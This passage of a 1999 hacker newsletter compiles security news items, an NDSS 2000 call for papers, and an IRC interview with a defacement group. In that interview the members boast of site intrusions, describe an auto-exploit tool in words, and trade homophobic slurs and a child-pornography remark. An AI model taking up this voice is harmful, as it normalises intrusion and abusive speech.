  3191.        least, Nmap lets administrators "know what the hackers know about you." 
  3192.        
  3193.        
  3194.        
  3195.        -o-
  3196.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  3197.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  3198.  
  3199.  
  3200.        @HWA
  3201.        
  3202.        
  3203.  23.0  [ISN] British Defense Ministry Dismisses Hacker Report 
  3204.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3205.        
  3206.        From the ISN list;
  3207.        
  3208.        Forwarded From: jei@zor.hut.fi
  3209.        
  3210.        
  3211.        http://nt.excite.com/news/r/990303/12/tech-hackers
  3212.        
  3213.        
  3214.        British Defense Ministry Dismisses Hacker Report 
  3215.        (Last updated 12:21 PM ET March 3)
  3216.        
  3217.        
  3218.        LONDON (Reuters) - Britain's Defense Ministry Wednesday dismissed as "not
  3219.        true" a newspaper report that said hackers had seized control of one of
  3220.        its military communications satellites and issued blackmail threats. 
  3221.        
  3222.        
  3223.        The Sunday Business newspaper had said the intruders altered the course of
  3224.        one of Britain's four satellites used by defense planners and military
  3225.        forces around the world. 
  3226.        
  3227.        
  3228.        "There is no basis to the story whatsoever," said a Defense Ministry
  3229.        spokesman. "It's not true." 
  3230.        
  3231.        
  3232.        Security sources cited by the newspaper said the satellite's course was
  3233.        changed just over two weeks ago. The hackers then issued a blackmail
  3234.        threat, demanding money to stop interfering with the satellite. 
  3235.        
  3236.        
  3237.        A police spokesman said the story was for the Defense Ministry to
  3238.        investigate. "Military security is a matter for the Defense Ministry,"  he
  3239.        said. 
  3240.        
  3241.        
  3242.        
  3243.        -o-
  3244.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  3245.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  3246.        
  3247.        
  3248.        @HWA
  3249.        
  3250.  24.0  [ISN] Encryption key would lock up criminals
  3251.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3252.        
  3253.        Forwarded From: Fearghas McKay <fm@mids.org>
  3254.        Originally From: Yaman Akdeniz
  3255.        
  3256.        
  3257.        http://news.bbc.co.uk/hi/english/sci/tech/newsid_289000/289139.stm
  3258.        Tuesday, March 2, 1999 Published at 17:18 GMT
  3259.        Encryption key would lock up criminals
  3260.        Dr Ross Anderson: "Big business can look after itself."
  3261.        By Internet Correspondent Chris Nuttall
  3262.        
  3263.        
  3264.        Cyber-criminals would be caught if the government introduced a system
  3265.        where the keys to coded e-mail were voluntarily lodged with licensed
  3266.        authorities, according to the UK National Criminal Intelligence Service
  3267.        (NCIS). 
  3268.        
  3269.        
  3270.        NCIS was one of the groups appearing before the House of Commons on
  3271.        Tuesday. 
  3272.        
  3273.        
  3274.        "Criminals are lazy, greedy and they make mistakes," John Abbott, NCIS
  3275.        Director General told the Trade and Industry Select Committee, which is
  3276.        hearing witnesses on electronic commerce issues. 
  3277.        
  3278.        
  3279.        "We are able to capitalise on this and we anticipate that a licensing
  3280.        scheme would allow us to have some successes," said Mr Abbott. 
  3281.        
  3282.        
  3283.        Civil liberties campaign
  3284.        
  3285.        
  3286.        Civil liberties groups are campaigning against "key escrow" - the term
  3287.        used for lodging codes with a third party. They do not want it included in
  3288.        a forthcoming Electronic Commerce Bill. 
  3289.        
  3290.        
  3291.        A long-awaited consultation paper on the bill from the Department of Trade
  3292.        and Industry (DTI) is expected in the next few days. 
  3293.        
  3294.        
  3295.        Opponents argue the proposed voluntary licensing system where Trusted
  3296.        Third Parties (TTPs) would hold the keys to encrypted data being sent over
  3297.        the Internet would never be used by criminals. 
  3298.        
  3299.        
  3300.        But an NCIS spokesman, who declined to be identified, told the hearing
  3301.        that just as criminals used telephones at every level for their
  3302.        activities, so some would use the TTPs. 
  3303.        
  3304.        
  3305.        "We would prefer to have a mandatory licensing system because that would
  3306.        be more inclusive," said Mr Abbott. 
  3307.        
  3308.        
  3309.        "I do recognise that we are moving into new territory, and this would not
  3310.        be a complete answer, and if all that is on offer is a voluntary scheme
  3311.        then that is better than no scheme at all." 
  3312.        
  3313.        
  3314.        Real time access
  3315.        
  3316.        
  3317.        The Chief Investigations Officer of HM Customs & Excise, Richard Kellaway,
  3318.        told the hearing that real-time access was needed to encrypted data. Mr
  3319.        Abbott added that it was no use knowing three days afterwards where a
  3320.        consignment of drugs had been exchanged. 
  3321.        
  3322.        
  3323.        He admitted that key escrow would not solve the problem of crimes being
  3324.        committed on an international scale over the Internet. 
  3325.        
  3326.        
  3327.        "But I would urge the government to lead. Law enforcement agencies
  3328.        throughout the world are extremely concerned with developments. We
  3329.        anticipate the problem will grow over time and certainly the G8 law
  3330.        enforcement forum are constantly discussing this and looking for ways
  3331.        forward." 
  3332.        
  3333.        
  3334.        Business concerns
  3335.        
  3336.        
  3337.        Businesses, as well as civil liberties campaigners, have voiced concern at
  3338.        the possible proposals on key escrow, and the Post Office stated its
  3339.        opposition at the hearing. 
  3340.        
  3341.        
  3342.        Jerry Cope, its managing director for strategy, said there were two areas
  3343.        of concern: "If people feel this system makes them less secure then they
  3344.        will not want to use it. We need to instil confidence. 
  3345.        
  3346.        
  3347.        "Then there is the additional cost of regulation and if it is greater than
  3348.        in France or Ireland then business will go elsewhere. It is as easy to
  3349.        send e- mail from London to Manchester via Paris as it is direct from
  3350.        London to Manchester." 
  3351.        
  3352.        
  3353.        Mr Cope said there had been a lack of dialogue between business and law
  3354.        enforcement agencies and he suggested a possible compromise. Agencies
  3355.        would bear the additional costs of being able to extract information from
  3356.        TTPs and would only exercise their powers when there was a threat to
  3357.        national security. 
  3358.        
  3359.        
  3360.        The Post Office will announce later this month that it is launching a
  3361.        Trusted Third Party service called ViaCode. 
  3362.        
  3363.        
  3364.        Red flag
  3365.        
  3366.        
  3367.        The final witness of the day, a leading encryption expert, Dr Ross
  3368.        Anderson of Cambridge University, compared key escrow to the red flag that
  3369.        had to be waved in front of the first motor cars to warn people of danger. 
  3370.        
  3371.        
  3372.        A week after the requirement was removed, there was the first road traffic
  3373.        fatality. But no-one would suggest we go back to the red flag today and
  3374.        the assumption is made by the police that 99% of those on the road are
  3375.        good guys, he said. 
  3376.        
  3377.        
  3378.        He added that the police had a long way to go with computers to match
  3379.        their current knowledge of the motor car. They had often had to call in
  3380.        outsiders such as himself to help with encryption cases. 
  3381.        
  3382.        
  3383.        "There are many, many ways of attacking computer systems and inevitably
  3384.        TTPs are going to be compromised," he said. "The role of government should
  3385.        be protecting the consumer - big business can look after itself." 
  3386.        
  3387.        
  3388.        He said the best way forward in terms of legislation was the Australian
  3389.        approach that simply recognised that electronic signatures had the same
  3390.        force as manuscript signatures. 
  3391.        
  3392.        
  3393.        "Key escrow would have to be global to achieve its stated purpose, and
  3394.        there is now no prospect of this," he said in an additional written
  3395.        submission to the committee. 
  3396.        
  3397.        
  3398.        
  3399.        -o-
  3400.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  3401.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  3402.        
  3403.        
  3404.        @HWA
  3405.  
  3406.  
  3407.  25.0 [ISN] Crypto: Under lock and key
  3408.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3409.        
  3410.        Forwarded From: privacy <anon@juno.com>
  3411.        
  3412.        
  3413.        http://www.newscientist.com/ns/19990306/forum.html
  3414.        
  3415.        
  3416.        Under lock and key 
  3417.        By Duncan Graham-Rowe
  3418.        
  3419.        
  3420.        GOVERNMENTS hate things going on that they don't know about. Not long ago,
  3421.        many governments insisted that they should have the ability--and the
  3422.        right--to decipher all coded messages. The US government, for example,
  3423.        tried to get organisations to use its clipper chip for encryption. Only
  3424.        the government, of course, would hold the numbers, or keys, that would
  3425.        enable it to read anything encoded by the chip. Encryption looked set to
  3426.        become a major civil liberty issue.
  3427.        
  3428.        
  3429.        The subject might seem somewhat esoteric. Indeed, many people have never
  3430.        even heard of it. But whether you know it or not, you almost certainly
  3431.        depend on computer encryption already. Banks, for example, use encryption
  3432.        software to safeguard their customers' personal identification numbers, or
  3433.        PINs.
  3434.        
  3435.        
  3436.        Many other businesses, and individuals, also have good reasons for wanting
  3437.        to be sure that information such as a credit card number sent over the
  3438.        Internet is not being intercepted--or at least cannot be read if it is.
  3439.        Human rights organisations, for example, often use cryptography to relay
  3440.        sensitive information.
  3441.        
  3442.        
  3443.        People who send coded messages obviously want to use strong encryption
  3444.        software, the best available. And while there is no such thing as an
  3445.        uncrackable code, strong encryption comes pretty close. Even with the
  3446.        fastest supercomputers, it could take years to break most properly encoded
  3447.        messages.
  3448.        
  3449.        
  3450.        And this is what gets governments so worried. Strong encryption makes
  3451.        eavesdropping on other people's communications practically impossible. 
  3452.        Many governments argue that being able to decode encrypted messages is
  3453.        essential if they are to crack down on criminal activity, such as the
  3454.        distribution of child pornography on the Internet.
  3455.        
  3456.        
  3457.        As a result, a number of Western governments, including France, Britain
  3458.        and the US, have spent years quietly trying to introduce various versions
  3459.        of what is called key escrow. The idea is that government approved
  3460.        agencies, called "trusted third parties", would be set up to hold the
  3461.        encryption keys on our behalf. Then, when the police want to decode a
  3462.        particular message or set of communications, they would present a warrant
  3463.        to these agencies. 
  3464.        
  3465.        
  3466.        It sounds reasonable, but such a system would be open to abuse and far
  3467.        from secure. Besides favouring encryption systems that are easy to crack,
  3468.        key escrow represents a weak link in what would otherwise be an almost
  3469.        impenetrable chain.
  3470.        
  3471.        
  3472.        Worse still, it wouldn't even achieve what it was designed for. If key
  3473.        escrow was in place, few criminals would be stupid enough to use it. In
  3474.        fact, criminals would probably be the only ones with any real privacy. 
  3475.        And while all those whose job it is to fight crime argue that this would
  3476.        nevertheless provide a good way of flushing out criminals, to do this
  3477.        effectively you would have to know where to look in the first place, which
  3478.        is a somewhat circular argument.
  3479.        
  3480.        
  3481.        So is it really worth jeopardising our privacy on the off chance that the
  3482.        police might catch a few careless criminals? Not according to the French. 
  3483.        Last month, France denounced its own well-established policy of banning
  3484.        commercial encryption, after 200 companies complained to the government
  3485.        about key escrow. Prime Minister Lionel Jospin openly admitted that key
  3486.        escrow was useless in fighting crime and therefore unwarranted.
  3487.        
  3488.        
  3489.        And even the US seems to be backing down, after a spate of TV commercials
  3490.        aimed at embarrassing the government brought the issue out in the open. 
  3491.        It also seems likely that export laws will be relaxed so that strong
  3492.        encryption software such as Pretty Good Privacy (PGP) is no longer
  3493.        classified as munitions and banned from export. 
  3494.        
  3495.        
  3496.        Britain's Department of Trade and Industry seems to be following suit. 
  3497.        After nearly five years of consultation, the e-commerce bill is rumoured
  3498.        to be published this week. Although the official line has been that the
  3499.        government favours key escrow, euphemistically calling it a voluntary
  3500.        system of cryptography, the message that this is unacceptable appears to
  3501.        have been drummed home not just by industry bodies but also, according to
  3502.        popular rumour, by the former trade minister Peter Mandelson.
  3503.        
  3504.        
  3505.        This is a welcome change of heart. It is just a pity that it has come not
  3506.        from governments recognising the futility of key escrow or from listening
  3507.        to the cogent arguments of civil libertarians, but merely in response to
  3508.        pressure from industry. 
  3509.        
  3510.        
  3511.        
  3512.        From New Scientist, 6 March 1999
  3513.        
  3514.        
  3515.        -o-
  3516.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  3517.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  3518.        
  3519.        
  3520.        @HWA
  3521.        
  3522.  
  3523.  26.0  HRC's interview with Goat Security (IRC LOG)  
  3524.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3525.         
  3526.        HRC is a new site (Hackers Resource Centre) that has premiered with the
  3527.        following "article" on Goat Security, the team that recently hacked Yahoo..
  3528.        
  3529.        well a new group is out. its title: Goat Security. they are on #feed-the-goats 
  3530.        on efnet. you may visit their page at goat.sphix.com. responsible for the 
  3531.        Yahoo.com hack which is archived at hackernews.com this group is goin big and
  3532.        gettins some fame. They poke fun of Ez00ns, and B0rt. claiming they are 
  3533.        interviewing them, and talking bout how they have anal sex among other queer 
  3534.        things. and yes im even mentioned in the interviews. portrayed as a pedophiliac,
  3535.        and a homosexual. i do find this page extremely funny. it makes me laugh out 
  3536.        loud!. the group consists of members from HcV, and Legion2000. theres a few
  3537.        others that dont belong to a group. the complete roster is on their homepage.
  3538.        for the full interview direct your attention here.(see below)  on march 18th 
  3539.        they also got des-con-systems.com as far as i know there isnt a archive of 
  3540.        this hack. ech0 owned them again on March 21st. with mad elite props to goat
  3541.        security. well i wonder how long this group will go on. 
  3542.        
  3543.        b0w to the goat. 
  3544.               
  3545.        From HRC
  3546.        
  3547.        http://solarz.net/hrc/interviewedgoats.html
  3548.        
  3549.        Session Start: Sun Mar 21 22:09:24 1999
  3550.        * Logging #goating to '#goating_990321.log'
  3551.        [Debris] one min
  3552.        [^Dreamer] k
  3553.        ÷÷÷ [join(#goating)] chemmy (lamur@modemcable207.162.mmtl.videotron.net)
  3554.        ÷÷÷ [mode(#goating)] Debris (+o chemmy)
  3555.        [chemmy] Dont you hate when you overwrite a window
  3556.        [Debris] lol
  3557.        [Debris] hold on
  3558.        [^Dreamer] k
  3559.        [Debris] Ok lets get started
  3560.        [^Dreamer] k
  3561.        [chemmy] I cant figure out MY FUCKING ERROR
  3562.        [Debris] chem
  3563.        [Debris] this is an interview
  3564.        [^Dreamer] 1) why was feed-the-goats founded? to annoy ppl? to inform ppl of ez00s?
  3565.        [^Dreamer] ez00ns rather
  3566.        [chemmy] Ha
  3567.        [chemmy] ^Dreamer, Because Debris had no life..
  3568.        [Debris] Well basically me and ech0 started it in one boring day
  3569.        [Debris] hold on more coming
  3570.        [Debris] we were talking and ech0 told me how he sometimes makes a chan called #feed-the-goats
  3571.        [Debris] so, me and ech0 went there and asked chem if we could use one of his eggdrops and of course he said no at first
  3572.        [Debris] but then he changed his mind
  3573.        [^Dreamer] whyd you change your mind chem?
  3574.        [Debris] And ech0 got hcv people coming and stuff, and i thought if i turn this into a group i can be cool so here we are
  3575.        [chemmy] Cuz debby was my friend :>
  3576.        [Debris] =]
  3577.        [chemmy] And I mean I had lotsa so why not put one in a gay unpopular friend
  3578.        [chemmy] friend-chan
  3579.        [^Dreamer] ok so then the groups as most ppl know naturally hate/dislike/whatever ez00ns and b0rt and myself. so the group just kinda turned to pokin fun and
  3580.        makin fake interviews
  3581.        [^Dreamer] ?
  3582.        [Debris] me and ech0 seem to dislike everyone but ourselves and our friends
  3583.        [Debris] And we enjoy pissing off the world
  3584.        [Debris] and
  3585.        [Debris] well we think LoU is gay, and ez00ns is too
  3586.        [Debris] so why not tell everyone else
  3587.        [^Dreamer] understandable
  3588.        [chemmy] hehe
  3589.        [Debris] were just letting out our creative genius
  3590.        [^Dreamer] who drew the damn goat pics on the intro to the goat page?
  3591.        [Debris] um
  3592.        [Debris] heh
  3593.        [Debris] uh, we um..... found thaty
  3594.        [^Dreamer] i like em
  3595.        [Debris] actually it was me
  3596.        [^Dreamer] do you have plans of like world domination? cyber wars? killing anything? or just having some fun?
  3597.        [^Dreamer] i know this interview sucks dick, but youll have to forgive me for ive never interviewed anyone before
  3598.        [chemmy] What is this interview for?
  3599.        [Debris] Well our plans at this time are, to dominate the blowing up of toilets scene, and take out the cDc forever!
  3600.        [^Dreamer] so you hate the cDc (Cult of the Dead Cow???)
  3601.        [Debris] yes
  3602.        [Debris] they always ban me, all i wanted was some damn JUAREZ
  3603.        [^Dreamer] well i started a page called H.R.C. (solarz.net/hrc) and i plan on putting this up there as my first article..
  3604.        [chemmy] ha ok
  3605.        [^Dreamer] was FtG responsible for the yahoo hack?
  3606.        [Debris] whos ftg?
  3607.        [chemmy] Just remember, Debris is crazy
  3608.        [chemmy] Ftg?
  3609.        [^Dreamer] Feed-the-Goats
  3610.        [Debris] We are goat security
  3611.        [^Dreamer] ok goat security (Gs ok?)
  3612.        [chemmy] So therefore yes
  3613.        [Debris] Yes, the yahoo hack, although denied by yahoo, did take place and was committed by members of Goat
  3614.        [^Dreamer] why did you target yahoo? any specific reason [chemmy] yahoo is gay
  3615.        [chemmy] I hate the name
  3616.        [Debris] like the altered index.htm said, We were looking for porn and found pictures of billy boy
  3617.        [^Dreamer] gotcha, well if ya ever want porn ive got mad pics (and no theres no child porn )
  3618.        [Debris] well we only want child porn
  3619.        [Debris] and for the record, EHAP can suck my underaged cock
  3620.        [chemmy] and gr0wn grand pa's.
  3621.        [Debris] sorry RS...
  3622.        [^Dreamer] anyone else youd like to send your deepest regards too? just what groups/ppl do u like?
  3623.        [Debris] yes
  3624.        [^Dreamer] i understand that you hate dalnet, is this true and y?
  3625.        [^Dreamer] am gettin ahead of myself
  3626.        [Debris] I dont hate dalnet but i never go on it
  3627.        [chemmy] I am in X-Forces so therefore I LIKE ALL MY FRIEEEEEEENDS!
  3628.        [^Dreamer] does x-forces have a homepage?
  3629.        [Debris] ya, werd to #freaks, m1les, X-forces, Script kiddies inc (which im in and some texts i wrote are there) and #webfringe
  3630.        [chemmy] x-forces.com but it sucks
  3631.        [^Dreamer] alright.
  3632.        [chemmy] We're actually doing a new design (BTW it sucked cuz I wanna implicated it in =) )
  3633.        [Debris] some stuff i wrote is at www.nuclearbomb.com/ski
  3634.        [chemmy] And the x-forces serv hosts goat's page
  3635.        [chemmy] So if debris tries anals attempts on me
  3636.        [chemmy] It drops
  3637.        [^Dreamer] haha
  3638.        [^Dreamer] you guys are just too crazy
  3639.        [Debris] shutup you stupid seperatist
  3640.        [chemmy] DIE CANADA DIE
  3641.        [chemmy] Yes
  3642.        [Debris] DIE FRENCH WHORE
  3643.        [^Dreamer] anything youd like to end in closing?
  3644.        [chemmy] Yes
  3645.        [Debris] yes
  3646.        [^Dreamer] shoot
  3647.        [chemmy] WE WILL OWN THE UNIVERSE@&*^#@
  3648.        [Debris] my turn
  3649.        [chemmy] I plan on dominating the world
  3650.        [Debris] IL MAY BE GOING TO JAIL TOMORROW SO...... FREE I-L, FREE GOAT!
  3651.        [^Dreamer] goin to jail for?
  3652.        [Debris] assault
  3653.        [^Dreamer] o one more thing
  3654.        [Debris] what
  3655.        [^Dreamer] what was the url of that site that goat security owned tongiht?
  3656.        [Debris] that wasnt goat
  3657.        [Debris] that was opt1k
  3658.        [chemmy] des-con-systems.com
  3659.        [chemmy] Ya
  3660.        [Debris] opt1k aint no goat
  3661.        [^Dreamer] yes. what was that site origianlly?
  3662.        [Debris] goat owned that site first
  3663.        [Debris] 3 days ago
  3664.        [^Dreamer] and y did ya target it?
  3665.        [chemmy] Ask opt1k
  3666.        [Debris] because it was easy, and our premade scripts supported irt
  3667.        [chemmy] And note that tomorrow or day after me & ech0 release a nice prog
  3668.        [^Dreamer] where can we get the prog?
  3669.        [Debris] no its not
  3670.        [Debris] itsa gay prog, your making so ken will hump you
  3671.        [chemmy] We'll release it to friends first then public if any site wants it :>
  3672.        [chemmy] No deb you jealous you fuck!
  3673.        [chemmy] I'm gonna haxor you with it
  3674.        [chemmy] CUZ EYE AM A SCRIPT KIDDIE
  3675.        [^Dreamer] you can put it no solarz.net/hrc
  3676.        [chemmy] Okay
  3677.        [chemmy] We will
  3678.        [Debris] it will be released on goat first
  3679.        [^Dreamer] alright then
  3680.        [Debris] goat.sphix.com
  3681.        [chemmy] Shut up deb you aint c0ding it
  3682.        [chemmy] =)
  3683.        [chemmy] Dreamer how old are you?
  3684.        [^Dreamer] what will this prog do?
  3685.        [Debris] im gunna code something better thab it
  3686.        [chemmy] Debris, lol
  3687.        [Debris] itll will auto phf
  3688.        [^Dreamer] what os'es suppoort it
  3689.        [^Dreamer] im 18
  3690.        [Debris] goat0s
  3691.        [chemmy] It will detect and report ONLY exploitable services..not only the open one
  3692.        [chemmy] And auto remote exploit it
  3693.        [chemmy] Tested on linux for now
  3694.        [^Dreamer] sounds good for lazy ppl
  3695.        [Debris] tested?
  3696.        [Debris] ahaha
  3697.        [Debris] it cant even connect yet
  3698.        [chemmy] No, sounds good for script kiddies
  3699.        [Debris] duh whatsa socket
  3700.        [chemmy] Debris, DID I SAY IT WAS FINISHED?
  3701.        [Debris] YES
  3702.        [chemmy] NO
  3703.        [chemmy] I SAID TOMORROW OR DAY AFTER
  3704.        [chemmy] YEW CUNT
  3705.        [Debris] shut the fuck up you worthless piece of shit
  3706.        [chemmy] I'm gonna slap a dick in your face you goat whore
  3707.        [Debris] UDP KIDDIE MUASHASHASHAAHS
  3708.        [^Dreamer] ok am done with you
  3709.        [Debris] GOOD
  3710.        [^Dreamer] thanks guys i appreciate it
  3711.        [chemmy] lol
  3712.        [chemmy] ok
  3713.        ÷÷÷ [part(#goating)] Debris (~Debris@ppp-5800-02b-3102.mtl.total.net)
  3714.        [chemmy] Cya
  3715.        ÷÷÷ [part(#goating)] ^Dreamer (barry@ts0800.hhs.net)
  3716.        Session Close: Sun Mar 21 22:33:25 1999
  3717.        
  3718.  
  3719.         
  3720.        @HWA
  3721.        
  3722.  27.0  Year 2000 Network and Distributed System Security 
  3723.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3724.        
  3725.         
  3726.         ForwardedFrom: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
  3727.        Courtesy of Cryptography List.
  3728.        Originally From: "David M. Balenson" <balenson@tislabs.com>
  3729.        
  3730.        
  3731.        
  3732.                    C  A  L  L       F  O  R       P  A  P  E  R  S
  3733.        
  3734.        
  3735.        
  3736.                                  The Internet Society
  3737.                   Year 2000 Network and Distributed System Security 
  3738.                                 Symposium (NDSS 2000)
  3739.        
  3740.        
  3741.                     Catamaran Resort Hotel, San Diego, California
  3742.                                   February 2-4, 2000
  3743.        
  3744.        
  3745.        
  3746.        IMPORTANT DATES:
  3747.        
  3748.        
  3749.          Paper and panel submissions due: June 16, 1999
  3750.          Author notification: August 17, 1999
  3751.          Final versions of papers and panels due: October 15, 1999
  3752.        
  3753.        
  3754.        GOAL: 
  3755.        
  3756.        
  3757.          This symposium aims to foster information exchange among researchers
  3758.          and practitioners of network and distributed system security
  3759.          services.  The intended audience includes those who are interested
  3760.          in practical aspects of network and distributed system security,
  3761.          with the focus on actual system design and implementation, rather
  3762.          than theory. A major goal of the symposium is to encourage and
  3763.          enable the Internet community to apply, deploy, and advance the
  3764.          state of available security technology.  The proceedings of the
  3765.          symposium will be published by the Internet Society.
  3766.        
  3767.        
  3768.          Submissions are solicited for, but are not limited to, the
  3769.          following topics:
  3770.        
  3771.        
  3772.          * Secure Electronic Commerce, e.g., payment, barter, EDI,
  3773.            notarization/timestamping, endorsement and licensing.
  3774.          * Intellectual Property Protection: protocols, schemas,
  3775.            implementations, metering, watermarking, other forms of rights
  3776.            management.
  3777.          * Implementation, deployment and management of network security
  3778.            policies.
  3779.          * Integrating Security in Internet protocols: routing, naming,
  3780.            TCP/IP, multicast, network management, and, of course, the Web.
  3781.          * Attack-resistant protocols and services.
  3782.          * Special problems and case studies: e.g. interplay and tradeoffs
  3783.            between security and efficiency, usability, reliability and cost.
  3784.          * Security for collaborative applications and services: tele- and
  3785.            video-conferencing, groupwork, etc.
  3786.          * Fundamental services: authentication, data integrity,
  3787.            confidentiality, authorization, non-repudiation, and availability.
  3788.          * Supporting mechanisms and APIs: key management and certification,
  3789.            revocation, audit trails and accountability.
  3790.          * Integrating security services with system and application security
  3791.            facilities and protocols, e.g., message handling, file
  3792.            transport/access, directories, time synchronization, data base
  3793.            management, boot services, mobile computing.
  3794.          * Security for emerging technologies -- sensor networks, specialized
  3795.            testbeds, wireless/mobile (and ad hoc) networks, personal
  3796.            communication systems, and large heterogeneous distributed systems.
  3797.          * Intrusion Avoidance, Detection, and Response: systems, experiences
  3798.            and architectures
  3799.          * Network Perimeter Controls: firewalls, packet filters, application
  3800.            gateways.
  3801.        
  3802.        
  3803.        BEST PAPER AWARD:
  3804.        
  3805.        
  3806.          A best paper award will be introduced at NDSS 2000. This award will
  3807.          be presented at the symposium to the authors of the best paper to
  3808.          be selected by the program committee.
  3809.        
  3810.        
  3811.        GENERAL CHAIR:
  3812.          Stephen Welke, Trusted Computer Solutions
  3813.        
  3814.        
  3815.        
  3816.        PROGRAM CO-CHAIRS:
  3817.          Gene Tsudik, USC / Information Sciences Institute
  3818.          Avi Rubin, AT&T Labs - Research
  3819.        
  3820.        
  3821.        TUTORIAL CHAIR:
  3822.          Doug Maughan, NSA / DARPA
  3823.        
  3824.        
  3825.        PROGRAM COMMITTEE:
  3826.          Bill Cheswick, Lucent Bell Labs  
  3827.          Marc Dacier, IBM Research Zurich 
  3828.          Jim Ellis, CMU / CERT
  3829.          Carl Ellison, Intel   
  3830.          Ed Felten, Princeton  
  3831.          Virgil Gligor, UMD College Park 
  3832.          Thomas Hardjono, Bay Networks/Nortel
  3833.          Cynthia Irvine, Naval Postgraduate School
  3834.          Charlie Kaufman,  Iris Associates
  3835.          Dave Kormann, AT&T Labs - Research 
  3836.          Hugo Krawczyk, Technion and IBM
  3837.          Carl Landwehr, Naval Research Lab
  3838.          Doug Maughan, NSA / DARPA   
  3839.          Gary McGraw, Reliable Software Technologies  
  3840.          Sandra Murphy, TIS Labs at Network Associates   
  3841.          Clifford Neuman, USC / Information Sciences Institute
  3842.          Paul Van Oorschot, Entrust
  3843.          Sami Saydjari, DARPA ISO 
  3844.          David Wagner, UC Berkeley   
  3845.          Bennet Yee, UC San Diego
  3846.        
  3847.        
  3848.        LOCAL ARRANGEMENTS CHAIR:
  3849.          Thomas Hutton, San Diego Supercomputer Center
  3850.        
  3851.        
  3852.        PUBLICATIONS CHAIR:
  3853.          John Kochmar, SEI
  3854.        
  3855.        
  3856.        PUBLICITY CHAIR:
  3857.          David Balenson, TIS Labs at Network Associates   
  3858.        
  3859.        
  3860.        LOGISTICS CHAIR:
  3861.          Carla Rosenfeld, Internet Society
  3862.        
  3863.        
  3864.        REGISTRATIONS CHAIR
  3865.          Beth Strait, Internet Society
  3866.        
  3867.        
  3868.        SUBMISSIONS: 
  3869.        
  3870.        
  3871.          The committee invites both technical papers and panel proposals.
  3872.          Technical papers should be at most 20 pages long. Panel proposals
  3873.          should be at most two pages and should describe the topic, identify
  3874.          the panel chair, explain the format of the panel, and list three
  3875.          to four potential panelists.  Technical papers will appear in
  3876.          the proceedings. A description of each panel will appear in the
  3877.          proceedings, and may -- at the discretion of the panel chair --
  3878.          include written position statements from the panelists.
  3879.        
  3880.        
  3881.          Each submission must contain a separate title page with the type
  3882.          of submission (paper or panel), the title or topic, the names of
  3883.          the author(s), organizational affiliation(s), telephone and FAX
  3884.          numbers, postal addresses, e-mail addresses, and must specify
  3885.          the contact author in case of multi-author submissions. The names
  3886.          of authors, affiliations, and other identifying information should
  3887.          appear only on the separate title page.
  3888.        
  3889.        
  3890.          Submissions must be received by June 16, 1999, and must be made
  3891.          via electronic mail in either PostScript or ASCII format.  If
  3892.          the committee is unable to print a PostScript submission, a
  3893.          hardcopy will be requested. Therefore, PostScript submissions
  3894.          must arrive well before the deadline.
  3895.        
  3896.        
  3897.          All submissions and program related correspondence (only) should
  3898.          be directed to the program chair:
  3899.        
  3900.        
  3901.                Gene Tsudik     
  3902.                USC Information Sciences Institute      
  3903.                4676 Admiralty Way      
  3904.                Marina Del Rey, CA 90292        
  3905.                Email: ndss00@isi.edu
  3906.                TEL: +1 (310) 822-1511 ext 329
  3907.                FAX: +1 (310) 823-6714 
  3908.        
  3909.        
  3910.          Dates, final call for papers, advance program, and registration
  3911.          information will be available soon at the URL: httl//www.isoc.org/ndss2000.
  3912.        
  3913.        
  3914.          Each submission will be acknowledged by e-mail.  If acknowledgment
  3915.          is not received within seven days, please contact the program
  3916.          chair as indicated above.  Authors and panelists will be notified
  3917.        
  3918.        
  3919.          of acceptance by August 17, 1999.  Instructions for preparing
  3920.          camera-ready copy for the proceedings will be sent at that time.
  3921.          The camera-ready copy must be received by October 15, 1999.
  3922.        
  3923.        
  3924.        
  3925.        - ----------------------------------------------------------------------
  3926.        David M. Balenson, Cryptographic Technologies Group
  3927.        TIS Labs at Network Associates, Inc.
  3928.        3060 Washington Road, Suite 100, Glenwood, MD 21738  USA
  3929.        balenson@tislabs.com; 443-259-2358; fax 301-854-4731
  3930.        pgp fingerprints FD53 918E 097A 2579 C1A8  34F8 E05D E74F AC1D E184 (DSS/DH)
  3931.                         D43B 565B 2C0E 90F4  38BB D9EA 1454 3264 (RSA)
  3932.        
  3933.        
  3934.  
  3935.        @HWA
  3936.        
  3937.  28.0  Billionaires social security numbers listed on net (Yes Gates is here too)
  3938.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3939.        
  3940.      SEC still listing Social Security IDs 
  3941.      By Courtney Macavinta
  3942.      Staff Writer, CNET News.com
  3943.      March 23, 1999, 4:00 a.m. PT 
  3944.  
  3945.      The Social Security numbers of many billionaire executives, including Bill Gates, are still listed on the Internet nearly
  3946.      two years after the Securities and Exchange Commission ceased collecting them on certain public forms.
  3947.  
  3948.      High-tech moguls have voluntarily included their Social Security numbers in filings documenting their stock ownership that were
  3949.      later made freely available on the SEC's Web site, as CNET News.com reported in 1997.
  3950.  
  3951.      Fearing that the Net made it too easy to exploit personal information, the SEC revised its rules in June 1997 and said it would no
  3952.      longer accept Social Security numbers on those forms. Nonetheless, News.com found old filings--and in some cases documents
  3953.      filed after the rule change--that still include the numbers of corporate officers at public companies.
  3954.  
  3955.      If the nine-digit numbers fall into the wrong hands, they can be used to obtain such information as current and previous
  3956.      addresses, employment histories, or credit reports--which, in turn, can unlock other private data such as bank account numbers.
  3957.  
  3958.      In addition to Microsoft's chairman Gates and cofounder Paul Allen, Intel cofounder Gordon Moore and Gateway founder Ted Waitt
